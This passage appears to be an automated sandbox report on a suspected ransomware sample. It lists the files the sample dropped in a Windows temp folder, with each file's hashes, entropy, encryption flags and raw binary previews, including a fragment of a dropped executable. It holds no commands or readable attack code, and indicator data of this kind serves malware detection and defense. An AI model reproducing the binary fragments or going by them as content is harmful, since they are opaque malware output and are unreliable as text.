                  Preview:[2023j[..h._P..K.........=..L..4..Yb6R.....{.5x.J*...x....^j^.,.L.e..*.......g|...g...W...~.@(x...g@..~...Y...Tp.em.2......[:.......(...G.-@.-.....x..).l......jb...U.(...d.I.$.0....[.....18J.p..L.%.5.nXPA..x_`[............t..k.....;tm.b.)...^.,.....HB....<f.Mb..M..7.:.xZ..d..(...,....P.k<....D^fC..O...$.C1..d_f...5.g..1.a.\."x...t..."&:^E..z..Tp.<.@.....q.7...T..@a} .......u;.......$..'.v..K...~...s...r4..O..4..$.d_!.........I..'.......%.p........le....... .e..Rr.!.. .Cz....K.....Vm.... .C..j..W7..<l.M.I..........1..<........J.A...n.J/.....:...[.6...M.W.=....,..9..V.P'.>.....w.,..*...x...."Pe...*`.t.L.9...._.:a.Cu......3...a..qj.@.......E..V.i.H.8T_&G..H...m...0)......Cy.#.:uAO.~..^~.s.m...+....6.I;.d.V_5....(&.o.%;.9U.Ml...*..F/.../qoY\$.v....T..hG..u...\..$.....$X....b....q.h..$.GIW.....V.....;...pC.j...........y...d5.0...~1t..iL.a.v.|z}....[....&..j......P.<}3.Tb...:.D'g.O....S._@I.....I.d!f..d...[..\..X{i0fXrUHVihm5xsI

                  C:\Users\user\Local Settings\Temp\msedge_installer.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):12309
                  Entropy (8bit):7.988771211891896
                  Encrypted:false
                  SSDEEP:192:bX8JzWcmQ7qA4wakSoa/MU5kHY/y3L32tN88X7e5mDP27Q/GavO:bMJq2qPwHgOHYq3CH88Ln0Qs
                  MD5:7928E3857A87E04B216C2997E612C7CC
                  SHA1:3E814EFAA76754A8A89E6C5E947587A730C56266
                  SHA-256:7A6FEBC043490BDDD4E5324DBC1C2EB5084CB3155ACD1A26144BE0F26FE3AE27
                  SHA-512:2D7249300409A286D0DFF76844A00D7C7217975A4C2D2EB8793AB8542C1E0F8FE2B62E08AF18E930428DAB84FF5E15C60941417BB4CF735E5A3B010BC1056CEF
                  Malicious:false
                  Preview:[6708h....J.Q....E6.e....I....>........+Z.p...+....U+.........F?.......|.7._......K..D.F6X..........=g.....0y...:.n.(...c......S........h..Q..<.c._O..Au3ik.!X...........-....H.0..`.*=.s......>.En.m<8..Y...N.8Z..rq.r.....D......E......o0)....py6...3Gg...P.ef.......p...ll... ..6..sCT..|..E.N.0xx.....:rNN.2...:\}.......v...O.#......5.9C.. H.e4m4....q$..LP....NZ.<]t...I..no}v(c.E......5qC.....%..h.....GR.]..OC?VG.qo..A..Z.p.....]L,.....qr..U.H.J}.qS.....QM..$..".......#....... ...X..9]WZ^r.).....e7R....m.!i..?aqOG........>o... z.).|.~.b..$...@.%..z.]...l.<...i...CP.[.rn;..sddz....N.1.1.c...p......-MM..p?W.b..dL.5.[..P....l.X.?....2...?..GiSf.......V.J..-..V4.*YD..[.G8......E.p..<.t..6..R.g.y.Ry4 .J..6..'.\.c..][.a....G..7.\..c.,4.x..'...^~..+,.7.prA..!7".o[x}=.Z.v..p.=._.H.,.E...0N=Dv.[.|.,.r....eO...;.l]...I3.[@IQ)......dt<.6.5..gb~...Ps...W.d..!3.E[y.\O ..$C...c.M......bi.~j.1!o...<....M.XI...q.]P2.<.rHD.n..8S/A.@.f....0...$7...!.#.?B...

                  C:\Users\user\Local Settings\Temp\offline.session64.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):66542
                  Entropy (8bit):7.997331081124097
                  Encrypted:true
                  SSDEEP:768:RiCyU3Em6Y7/HLNLgpDPlqQ7nRcNjCUYmDDFHh13JppFyRSVNerUrjbV8cpuBXru:ECyUMZP9cNj5Y2pHnpFsSVNbrvwzqq+
                  MD5:5423B708CE256CB70072D33310EF04B9
                  SHA1:5020779C818A5B091E306704C12FEBB29C6FFE72
                  SHA-256:851BE28A624D215D5BB273ACA9871B56B69AD3D1E8C7EF40877AE8CE40E80622
                  SHA-512:4AB84A3825DA43658C712315EE9D27590716F5901A50F960C15F7216C4142C8DC834BCBD5476549DDF80010AE16B78E353D11619EEB2C7E158DAED6532121CAC
                  Malicious:true
                  Preview:1G.f.Ws.3R7........F.(.!t.G.8..&....T.}..8.zg... &..1...S.......qw..`.. .~....1)N..D..q.\Zq%|Sw}..Y......`Z..,uV...6.=mCf..........C..K......]..!.r.E>7....sl...B.=.C.&...9......N,q.wL.cZ+.t^.K-..d.\h .a...4..}kR....*X.Z....{..yH7e...X..T.........I .L.u.........w..Rs....y..}..Y..w..=...m.&.}.IZO..r....Z...*...r...i..|.H<,..S.1.@.'.$L.D..uQX............'.s.&.n.1..+!.H..]...{...j....:..r.j..q....7.Z..%>........V.. 2.G.?>........"1....3...>.......m..\..nIu...._{....Y._..E..U..yi.4.............I.G../.....7W...a.<V`....P..s...|W..}.......1.Pn.r...-.P.............Y*.......v....r..Z.bw.h.."....I.6...[??..w....I>7~.....+NE..K.@.y.;VP...sy_.[Wp...9..^.\|.p/..eL1.<..s.....>....d..&e....i#s>.n.I...,.-uhO..._|ju..s..J..IL....\...P.....?2}..ru5".1x.u...~.....H..{.e.:}.O..G;w.........*..1..K(A.r.......Kf....A.A...CN.@.....'.Q^,I....A...)._".ITw.{..].>.....^57.....vK.C.:..kT!.3&.....W..ak#...+........<...".y_..c.e........#.Ar..B.Dk..~.....q..&/.1..>....

                  C:\Users\user\Local Settings\Temp\prep_Form_JSI_API_not_a_real_file_V8_perf.cache.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1045
                  Entropy (8bit):7.774028334519885
                  Encrypted:false
                  SSDEEP:24:yljM15Mci01hA4Ap491YYviGS5dojG4XS3zbD:ylAAWhA4RaYviQS3nD
                  MD5:B397DDCFC46A50B3DBB287CACC5F0FB0
                  SHA1:881FA732003ED16242CBAC13DABECF62509C2990
                  SHA-256:5D40EB46ADB76D59AE29739D42160B8DF18D734BDD8B5D675D58B571091153A0
                  SHA-512:B76FE735B0287CF667F30ECE035501A4EC5264F8831C1E48E76AD0B1C413DF5AAC78E91D70F4582048766A6D1B77A2388D55A1DC8774B62E1E522344E9A7D6B7
                  Malicious:false
                  Preview:RNWPR....o...6.g..y.U....\.{2.I.a.....&+6I.3Q*...w.5S....3B.[q..&..1K...d&.?.z.Ed...p.n3.?..i99..[...g.,.]+...|.D..I.(..<"..=.:....UK.......'...-.w0..Or..$.r...g...(%.o#.7.H.om.......a.".:g./.mK 8,..!.'..0..r..3..>9....1aeg.;.....E..0........%.w.~"/b>{.K.\...8...N.Z..p.^....>;..O.u....7.{.R.F.9B..........3.TJ.v.DN..".O.....r..n....U..S.]..s.].D-....q.}.....z..l3.w.,.K$}..T*......Tr....M....{.n..J..7.....lV%.`w;.u0............ .p]@e.%..0.#x..f*.t....^.q.v...."|53.....8..K..Qz;?ATH69,......o....3l.`...l/.......A.![.f2,..1.F."{s.V@Ab..A{..y.M.4.....<.M.Yo..C...Rfs.....2T.F.......~#.....O...eY...iQX.=.. X...i.q....4.g07*$...b.O.7......%.6.~h.8..|...l.....U...}..7.x.._F.,...-.<.?j.1.~.V.4.......8)7...Q..).....y..a..X.....;.....'.'G...._~Z....G=.L.h...Iw..I.s...3......3.m..g:..i..4..D{........76..p..6....#...v.5.../-4n.U.1.j...F....3e7....8..T...u..6.y...l(..`..9...q..V..ei:d....>.x...A...2..2...=.'..=}..Vi0fXrUHVihm5xsI9Icg243YMPJqd748Oc

                  C:\Users\user\Local Settings\Temp\prep_foundation_win32_bundle_V8_perf.cache.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):662017
                  Entropy (8bit):6.820279805113416
                  Encrypted:false
                  SSDEEP:12288:k+J3CjxGqhKeYTEU59Hmv3AxoPs/cgKY7tJF:kqyIqoeYJ/Gv3AxERCF
                  MD5:0BACC4C2F38C2B1013D54A84E03AE34F
                  SHA1:DAD69E4A0BAF28144A3EF647064616FA72BB4897
                  SHA-256:965A568702B190A72C796CBEF6B0197BA47923549BE375994AF9971B971E9FA4
                  SHA-512:AC9F4E58EB05BE287FA8D397106938FC7681961D70C5F39513F3EB2B2FF7C26AB9FA59F61A8F745C4CF3FE92866F020EFD89DA004D4F621D821ABF8AA3F31D9A
                  Malicious:false
                  Preview:RNWPR.'.<......H-%..}..:V]..o.>..~...\0....x.k...-...P3..y..z.W...i`......g.{....=..+.....`.....l.1.=_.=.Tq.cw_..].7.R. .\....'...M....\...2...t....$u"L.....Tji....)..Hr.".A.t.j...v..z6Y.Cs.n.r.....s.[a......Y._8.=...AT)...\Q.!....y.Z.4Z......=........|'..n...bc.F.N<...".f.E......}R ......?r.....f.d9..1..x.....72.E3.z-_..>..j..._.Jq..u..<.Y.....e..,...........5.-..E..Z.D.P._.@o..JKn....s,f.....i.B...T.e..;#..q%.f.....T.x...d.+p[...INm7.,...[j...MH$98F9.x..7hN..X......^~# #. ....R.I~c..1...uG......@.$....?( .5..Z...b..~....H...+,.G){8..W..7...M].G.`.7..T. SG...I.i^F....SR..j_G....@2.M.p..aXE0....t.....:....v..a.....J.y.k.....{.q..2{&xc..4..%..ORP..4.!...n.-.jQ....\R~.*/S~R....JA..8.....l.bl......07.;Q..L.W.QCX.O._-.t.rf...K.?.H....SwL..gM;%.....AuXD..y..*.8..T........{..s...C.......0..[9...lj@hTHP...!.T......H ...|.X.F....<z..K...3#......N..B.hx(.....$...C...`......}....h&...O~.r.C....r.P.S ].M....c.T.zW.....;....0P.8...o(>....]....G....j..4...a.

                  C:\Users\user\Local Settings\Temp\prep_privacy-sdx_win32_bundle_js_V8_perf.cache.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):193301
                  Entropy (8bit):7.870118251417856
                  Encrypted:false
                  SSDEEP:3072:b5UAlTNKK+EV26U1bUyd6QWWrYGAT5ZS8Ij0P1jvOfA3cWtnXM7XB6v7G1rElDb+:bxN/ObUgtWWrdoZ9j2ElnXM7XIwW8n
                  MD5:ADE3CA080A201A4158D55604A7DF982E
                  SHA1:F8318B7270F5A539B2004008C39BFCD7DA7B453F
                  SHA-256:30300340ED59BCEF9A03CEC8979F2307B121596888CA593B067E83EF968D85FE
                  SHA-512:4F32A351CEFE7033A57BC08B5C654793BC2B4498682AD1E1547084DD56D6C7DDE5C22254F1D9E66AB00E6B8831451902A1270D43DEA9D805B32E4D7C7C5B744E
                  Malicious:false
                  Preview:RNWPR....4R~.V....^Kr.....(..F{.%.j....o..-.X.=..5.Su.;%]..c.(.V....l.+.2.......o*IL.....J(...=....Su.!He...-J....~.T...r....&.>...5.....@g.....@..N.o..Z...@J.R..8.. }.=N..y.....[.`.=.7w.2.T.....7.q...VO.l."}.7.nb%..x........&...=..;.{L?O&R=...UP.....^d..&*.1S......C".v.F.i.S[.vv2.K..E:...G..,D...}.d.6......u...l.-j@.:...}8.%..:....Y..CsJ.)|....K..u......x. r.v.te.z..4....z6B8.c-.TGs.u,.n.2...(1..w... .3X%..6.{.....Nq....7...,.D._d*...z......P?.._X..%.f.VT.vf.v..0.T.?3j.5..c.&.Gt..,9Ih*.<.|x4;+........}..i%..q..d..6..*r..\2p.7i....E........whS.M......,.....t%. ,.1...\.../..E...Y....Z.<.;.%t2..H.oCm.8..p......X.{F..-2....^.... r..D..x..{.....q|.b.^.....f...B....1|.N.....[.sY%h..1...r<A........_....m..o."1..7.q..MSF{.?.Y?...b.L.~...!..*.'.G._~.....H..^].EwHl2d..*....dA..M....._"...;..s}.(2L..$.T&....H\.#.s".Z...*.. 0y.._.z%..F....u......-E.F.+.A=NT.8..z4....%.{.6<u.7.........*.QJr.../.E..=.W....t...s..<.".0....!=...,.....q.|......D.2.T..i~.L,...

                  C:\Users\user\Local Settings\Temp\prep_ui_win32_bundle_V8_perf.cache.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):240209
                  Entropy (8bit):7.548777414489805
                  Encrypted:false
                  SSDEEP:6144:h1sFewsqQl8df8zr+AH4n7FfCSpFnqW7KfDv9nZ:PsFXQQudH4n7hCSfqW76
                  MD5:B0740B3F7040FE68F0497D8ED912656E
                  SHA1:71C1E0D4B21012EA72F45950B66751E0D86097BD
                  SHA-256:4651D5F0EE7B573FD2648BA5B7DDF14A8E69926292F8A64ABE9E39F17DC5DCB8
                  SHA-512:5AE72EFCAA530B6BE053025D291DFA5BBB7847A53F28E0223BAAAFB638DE0B5AD4A0A161DF794D8D8A86E6B2DCF942B5C9DD40FB9792B2193AFCDB0068517430
                  Malicious:false
                  Preview:RNWPRM.f..6P;..y'..Ql.....(..n.T..`G.h..}z...^..K....."@.....0Eq.g.....9..".....Z....h#.m.I.. \....s.@\ .lp..5.H..r$E.P~n...PV!..~2;j..4.+...GD.u...MA'.^.Zk.H.dad.}.5.I."..[(.n"<tu......O......>+*....!.../A..7..H.G....:h}....1.>#.R..%x....CH=.`.DF.....u..n.Dv...s....2.j..*...$.....>...N...i..;.....m.}.y.e(....mD%..4E-...S."y...N.."...{>...i..o..~....\........m...s.....Hw7{Ka.'p'.g8{....."C:...$n...b\..!....<.....>......Ug..lG.k./W.;.6.O.%).H.7....YP...]......Qsq.|...=u.\>......~S..v..*.D.......ex.I....A..R_".{z.....6.a..Z..M......%9..!Vr...f.g2...9...Y..~..M..KK".....H.9..v..q.,B.>a..>.....wv0....%..@.Z.QJ......i...$_.,wX..4m..Y..B.!..>......!2..>p..Q3....TH..Fy.+..fW(H..h..tgUU#ic\..Y].U.y..V....$ ..S....*....D.B..0..d..}.+.w.E.....G..:.5.....y+/~..G.5...@..I....D..r......k\vT...v1..!..K...k.;....3.@.b@.a!qC93......8.>...1..#....=....a.:~\<......,.>.;.oQJ[....dj._ V}.5.t....Tl0*g....MF..*......(.......X...@~(.......c...l...

                  C:\Users\user\Local Settings\Temp\scoped_dir10952_1826612563\f92dd30f-d70e-4c79-98e6-b827a8bb342f.tmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:Google Chrome extension, version 3952428803
                  Category:dropped
                  Size (bytes):248865
                  Entropy (8bit):7.985896417332284
                  Encrypted:false
                  SSDEEP:3072:Zl4oVHfwJrs6FHQAqzhae8G3KDq/xlvgeknA63wF3I0mIVvSyJ1ioN+VABUGDcax:7Gs6dQAqAe86kALlI0f15k2BVcaxlnfB
                  MD5:D0ACCB90B233C2B87993DB874EB4FFC4
                  SHA1:A089A3C109E6A904A1A95748E39A69D90666243C
                  SHA-256:6CA7057535A98B2CE5E858A152C84FD0134FEAAF99A5D8C53ACBA6393471603B
                  SHA-512:F9E302613E7F72819EE882448877A3E4903E032D515F5338FE5EEC0D16C3B200FFE826B81CF896C0C145CDBB437823861DACD743D44F99E3AC27752C6825BE8C
                  Malicious:false
                  Preview:Cr24.G......;/8R1c'yge.+..oA.m..Q{a......FG.0i.]....#..w`..H.s?k8c...=..Cn....n..:Cj+....d.TC.<.HhS`..m.B%..^.\C...\.rj.fcR.J..k..@.4.e..y.%".ms.)....Ad+'.'......b[;....s.9.-b.a...j|..../..$lwG'$.....?x..U..2.2c...\...t..<.W.H=.....`...43Z-e....:......*......'V8:..Xt.........b'.F......2.|.@.......+...I.#7.#....q.q....U..1...Z ^N#..=..9....(.1.o...z..GYU.(fE...M....iat10.@.z.H[@..QiW......O....>...k;r.<.....+...d.<.)9.....&U..@0....r.&....!.....c..Lw..diw.3.l.gM.....oO.?.L}..7^v.i..V.Y.v......t...............C.K.]....t'c..?..Y...EW....Vr..rD..E....h..90.....=2.$ h.......bR..y.?.C.........R.K. .4h..G..u...~F...iO.d.w.^Q..4..|F..>.3G_aU.'.j......A..6a......&[.?.6W.....1S..!.q.0P.L..........w.=.D......n........=..'..HM..}.....\........_C~...4i....!O@x.n=K.f.S..#..m...,..z...........&...<...u... ....U,....6.l..*.........o%T...W..F~(v.g..2.s#........>;..| .]...J...?..p$./B&i`v#.?:...C...U{.....s...MQ...$#6..ku..d..g.$.lM'..o?....d1XLb...%.ac

                  C:\Users\user\Local Settings\Temp\scoped_dir5952_991612011\10f5ef49-b826-4bae-a469-4fe1cdaa885f.tmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:Google Chrome extension, version 3594724867
                  Category:dropped
                  Size (bytes):1332939
                  Entropy (8bit):7.991129311599401
                  Encrypted:true
                  SSDEEP:24576:Hga4e8+ZhzVJofhWbwK1GbejcrbBdXYQHv6voyQFQRHI0oTFU8zatMxpSA6MLG:HrZ5L371GFrbBKiyGAo0EzatGab
                  MD5:8011E7A2831D025B9507BF7A77B83C0A
                  SHA1:8178ECEC0DFFCB66E3DDF4C2F5D867419273230C
                  SHA-256:17B32AFFC456557A6EF1DE6523D1F6C3731217BF5F36496F1FE6293671C08DB1
                  SHA-512:A9FF204F1E9B091CE30C4F3BB3924B5B347D6E887D4F52ECCB1B1C901E06A89A245404D44836C3349B69ADA3EA0040808B1956EED32EADC963E5BD5853E57D26
                  Malicious:true
                  Preview:Cr24.&C.rfi......H.|V.Z..Q.n...Y...r.y..2 ..W..+.s\'... ....{e...,0|wg....6Zy.....5......@D..}...~.D.'......?Ca.MQ...q...mY\..s...TD..9B.7h.sgM..R....~>.,.U.Tb="....y..=xv.4..c...B:.. (_.]c|'E>@.[..eh'.W@_9.9....6..d*.....zi.aK..s...TG..N.....|..s).g.K.....`:.\3<k^..m._Nrhy.+yx.Y.C26...VJ..I1.]2....96....<.......0.B....X...v..?1.[..xt..2..\a.Gk{...C..aO.M.........f.*.#.-..........~...~...b.g....Sc>.R|D.[.6..|....G/j......Mb...Y*.&.S......E.|.W..f...\.K .,...{.2..oR...'..Kt*.8.1QV....Q`...,X.6.bh..!.......L..'.....9f../..C.\C...b~.$>.....n.k.....XM!......:....+.j:....../.K...q....f]d.;^d.........^nt.96.s.i.....b<.(.d.F..#.ZF.f%d..K7....]....D...sv.r.....8.Z[...x...L9...)..b.8i7.b..\.aI._.....ZH..#J.U.c..Y.._..m..F....J$S.M.d,.S./4.W%I...,g?.c.32.'........(v..,.:t.im.}.Iae.P........3 |.[.YX.K...5(........T.(.~..Bfjy....e.9..`W...d.......@..1.a.0.&.Dz.7a...^_.5.....z&.|...K:\!x..b.i...+...........l.\;[u,...F.p...0.X.U..e[9....

                  C:\Users\user\Local Settings\Temp\tmpAAA2.tmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS-DOS executable
                  Category:dropped
                  Size (bytes):810830
                  Entropy (8bit):7.956402533425356
                  Encrypted:false
                  SSDEEP:24576:7+VSMOZctE5eAHrJaBjBgS4BgSSxeVu/8UG4:7+VSZZqE5/rJ6gS+SxeV8JG4
                  MD5:4164A1D814C8FF34EF41A3496FCC7D65
                  SHA1:D31C8AF61DD6B93497AA311D442CDAD35F488B45
                  SHA-256:0F0B16785AC76345463C1984AE5A7C1C715F99327EDF506C4A16AAC461751918
                  SHA-512:81DB1FD5D064CDDDCD1CC362FBDDD8BD4B57E4F4CC6FA34DA79F6D977CB5FD927341F9F3247DCBE1679849451C950903A260D6413FD86366FF25A05A8C4C3B5B
                  Malicious:true
                  Preview:MZ........>..4.M.wE....'.B"q.>7}..J.B/...%dfd.A.i...v$E.|..r...y..0..X.bU..'.k.;.*da.G....;1..-I.'.....&M(...g.v..t[C.{v..GI.ubGOY..F.#.U.Pf.I.y.....37....}=.R.}.1.Nd..~......x...h...b..W.@vU..M..?Q.B(..wm.Q._e}6...q..#.i..-rD.e........\d.0ie... .Z`Mr.+..V...W.0...<..6...8..C)..4.f.I.~..(..P.\..].k.O.zM...XsC..... _..e......... .g.....6g.....~..W....N"U...'.N..^..,...t.}E&>B..h..V..y.~4AF..$E..'8[........I.f@|M......or.+j.g9..VVz.a...n.V(...w..F.q.l+.L0.....U9...m-c.0t.y1.'M0H..Mp..E..dE.2,7Q.TG.M....u........CZ[Y.a...fV.B.??........u.....GW...f8c8.;.....I..\.:.X.....[..E1'.2..dH..&...46..U'H..b.x.O........$.....7.1.zUP%.;o..M.m.gtN.p6.<`..E]K./H..T..v [.qb?..v0...y..8..'...=..3R...{.*p.N.c..n.A...C.2$/S.......t...v..Z..w......].R.:...:..H$...!.k....W..T.I.~........C........s..;......a..,.D&j.t.'W..Ai..:;x...~...u..0.0.I..`..I....&..h.\..i.7&]...Pp.~[.o.7..,....|4]+].I.....p.%8.0..ktBM...5.#|e.YY.'=..g...J1.PW.6-IN..j(.c..;.

                  C:\Users\user\Local Settings\Temp\wct228B.tmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65188
                  Entropy (8bit):7.99693753309651
                  Encrypted:true
                  SSDEEP:1536:fNgQOzRBB17zm/8IU8QLD45r6K4LZDv/4Ow7Vg4PvzEOS:fNh6D1mj3UX1Z71kVg4PdS
                  MD5:1E9CEFBEC655602AFBC11E98791E7561
                  SHA1:663F3139C8B76F77432F06216EB94FDE42B44540
                  SHA-256:8A337DEE70B1188471DD1E20D3A2925166B672744E535CC00ACB7E35DEAF62E6
                  SHA-512:0C3C5332A2540A788B1A5D4D40AA760B4EAC28F6F12D004657233B4D900CC07A6336D6C54F352F3E14A950013EE5B96360D4E13A321682782427A333BFA4FE89
                  Malicious:true
                  Preview:{"ram.j.9..R.....H..I".z..Ma....\?;......z......fPc...S,. .@%B.FNq.4g....&9{......~&.....Zb...m4......do.....'..........gv1O.~.]*t....2....0}..e..Fi.Ay.... ...V.@}+.........;.....da.l..k...EZ..aARsdz..l.ou.....I<?.....)'.....x...G..8Q.P.1.z..U{...~<.Y.?...?.SC..es...$-..-.[........_........_Zg...-/...0.]...6GF..........'%i.3...HK....[6..h..(..h.Fo.w<....\|..\...../.K..;,..47.A.x.....X.M..]X-!....[z'].....zJWC..VB.ncl..J.$.zf..f>..... ...E.....bN.{1...o.[..u..H...6..}1....Yz.6.)..0.=e...OAb..j..2...+?!...m.......p.6,U)H.M...9+.fT.ZI......cX..........).K.4'I.(..+..b..A.....<i-.....}...z..sZ.A.,(%..o]$,....m.YD.6........G........0t.Ij.Y....*2.......5....Wf..}^....\.`".NIQ.l..{..Uh.5.+.%.....b..T.....b:...>......(z.......o...Q..I"#.....G.:.....X.BL%..w..L.Th.......&Ni..o.`:Z..&Z9....B...EfWq.).5.k-..F.......J..G=n....we..8...[......ip......'...r2.M5..i.CX.:.Y%N.6D$..>%.Ld.r.;C..u(.z..`;..`x..HJ>.S[..Q..9...v.W.!..]i8.$.....d..

                  C:\Users\user\Local Settings\Temp\wct4054.tmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65188
                  Entropy (8bit):7.997160521232647
                  Encrypted:true
                  SSDEEP:1536:fPU+aqE2BVwZhxBNeo910FqXxqCirg3qGUOc5EV4CXces409l5NE5:lbBihj9WFqXxq/gvk4lKf/W
                  MD5:1CC17E8DCD519E56F5F1CAED215E0A7A
                  SHA1:4AB25EB032B8D5C12204C57C5124FAE352B8E327
                  SHA-256:3CBA0FC90EC232E7923D53248AD153E869E60C5CA2C52E8EBD57829A644D928A
                  SHA-512:5A7D9633E2AFDE67676555A3FAEB9BFAB58DFA84E10C18BF74D50BEA78E89318AB5275E82D2CDD0F78DE0D273D9CA4A236D1ABA283D2F24CAB85D5361CCA8356
                  Malicious:true
                  Preview:{"ram..DM.CD(.2...%.s..z.GK....C2^......D..o.Lg:k..>.j.An....!..V`!...n.8W6#U.@N....jBf:x.)."...f..N.o.h.U.2.[[..n..Z.?.-......{....p.w.k..!....i.....e..k...F.@.....y........;'B+..h.c.S.P.^...St..../6H.....=.].n6....u8..!.A./.O...O.1.f....Kg.D4..17...............C\!lSmi.G$$.....^.s..,..=.v...jx.-A.0%.n#.-...!..7...de..$..._....sG..8p.i....C.H..,.z..jk...i.rKs..q;.B.yY.... .@.3.".f.....?.9B..y>..W.f...b.@.R...4..8{.9..X..u.MHe.z....N..2.].+..v..lz.3r;".....p{e....`g.8...".w.Ar]{........u.\..(E.m.J..{.X........ .....^'.7.oq..&.?....77%Z"}P.....X4.%X............#i.F\D...f....cM5.2.p.[9....?.t.P..R....I.e.#...q.3..#g FWV<N.61...........i........&..[O.....9c.d..g.H=v..*.......(z."f....d..yG........w..^o.30......IMA.D.+`...Q.}KxY.cF.....M.v..9...e....64!:...}m;...]....TE.x....s.[Y7.bf..3R...=[+.........Sn.L <b.+.I2.0..Z.CG3P".^.T.......$]...T.~...6...).DC *....q<....\...u.w.4..p..O.z#...9.=..lh.IH4.~...-.3..=.4. .1.h\*..,7S......

                  C:\Users\user\Local Settings\Temp\wct7120.tmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):74526
                  Entropy (8bit):7.997551462787694
                  Encrypted:true
                  SSDEEP:1536:Ni4tuXZFejRyDzVzM4Xe0KVIPQ3vc4/0rcLl1aS+wlHAL++:NduZsADziOevIPQ3p8cLlb+wlHp+
                  MD5:1ADBB5BB17ED0030223FE9145DEF146F
                  SHA1:FE4B9527EB9F893E045DFE1A1EA66ED064102575
                  SHA-256:A5D3FF687D2207E79A279AFFE5D9D0926D3BAEFEFE4CE4E1A73B85D5DFA87D83
                  SHA-512:0D791B825E22668ACCE72906F25D11BFA9914BBB0A21E20C1877138E65D8C9D78D07FD68F36A91961A961098D4EF53F673AB81EC4AFF612EE35A96AEA356DCCF
                  Malicious:true
                  Preview:{"ram.~...]ax....F.K.G.n._..aT..0:.....c....|......3L.e..x>....H.W.._.nT?..../...:...#..?;..W..........@.......g........I.`"..PlX!n......t!.........$.'.%(...t....1Cqw.U~%...5U&.F.....21..i@.......5.mS..G.1.(.=9.I.....-.2...V..e..@tXrz.C,....:....I.d..p....0.....h.>X..X.o.g+.^.Z*...H.5.Lv...{..o....F..fd.A..k./.C..P..G.....W.E..&...f.....\C)......p..`..#..1.....8...E....!...B... Cr ..~O.(l!?y..wQ..5...Z..k..WuM.F]...!a......O.........1.x...V9].H....x.b}...$p.._.G..].b^....#...T...h.oi^^.}o.i..$b<#.GH.@..}E...M.y....^bj.k...Q...q....%.I.'t...e{&.j.;....j6.&.e.F...........@.3%.......]|....Y.+$H.k...b.....)D@=.....=f.T..Q..8.2.K'.......%.^..6?...8.1H..>.u......A";.Fc....T.9sc.~.zM.f......+.H].y'.gh...'..k.i........?...a.....'|..&....&...I..WC..\.a......$.u.......g..`..c:......l...R.'..q...p-w4..D.D....v.2.>0Y..J.F.....a.3.o..**.C.+......B......R...5Ky..6..d._..=...:...d{.P.....,.r.|..:'jm#yU.u...GN*..j....u..`.o.....s&.]...n.r3^..G.b..,.

                  C:\Users\user\Local Settings\Temp\wctB366.tmp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65188
                  Entropy (8bit):7.997108075295797
                  Encrypted:true
                  SSDEEP:768:uSteOvNQg8jChvFu7JjCg51J+GACVjw/FBVTEJ6Q0ayYJT72h2y9/PbqjCzc+z3a:PNh8jC7ejCgUUF1JHg2yZPWjCX3Czz
                  MD5:5631D631CAA6F1DF5375A9082B44D5F4
                  SHA1:688472609104D134D526AC25DAE4DAC3813E8A7C
                  SHA-256:FF256F96571CCDF3EFF0E0FD762A55BEA12566D5B7CE83999DBBCBBBD044024A
                  SHA-512:9C5A11925F408AEBC93F2BD91194F2A8A625338CBE11D536DFF6F19A52ECED5A9C2F563A56B84C8D5BE3981DBB2881DD2DC7C31F81C514756A69D6D4E6D77BDD
                  Malicious:true
